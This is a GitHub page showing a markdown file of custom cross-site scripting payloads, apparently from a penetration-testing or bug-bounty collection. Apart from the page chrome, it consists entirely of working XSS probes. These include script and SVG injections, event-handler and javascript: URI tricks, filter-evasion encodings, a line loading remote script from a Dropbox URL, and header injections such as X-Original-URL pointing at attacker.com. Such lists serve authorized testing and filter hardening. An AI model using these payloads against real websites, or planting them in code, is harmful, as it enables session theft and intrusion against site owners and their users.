Skip to content

Latest commit

 

History

History
20 lines (20 loc) · 1.12 KB

xss-custom-payload.md

File metadata and controls

20 lines (20 loc) · 1.12 KB

Custom XSS Payloads

<img src=1111111><img src=1111111><a href="javascript:alert(document.domain)">axxx</a><svg></svg><img src=1>
<script /***/>/***/confirm(document.cookie,document.domain)/***/</script /***/
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(document.domain,document.cookie)&NewLine;>X</a>
<iframe onload="javascript:prompt(document.domain)" id="hello" role"world">Hello google
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
returnuri=%09Jav%09ascript:alert(document.domain)
var onskeywords = 'hello';onload=prompt(0);
"hello" onmouseover=prompt(0) world=""
test"t"\t/t%3Ct%3Et
True-Client-IP: <h1>XSS</h1></center><script>alert(document.domain)</script>
"♈<<sVg/onload♈=/svg/onload=svg/onmouseOver=confirm'1'><!--♈//="
X-Original-URL: https://attacker.com/
X-Original-URL: test//test\
X-Original-URL: https:\\samcurry.net/please//work
/><svg src=x onload=confirm(document.domain);>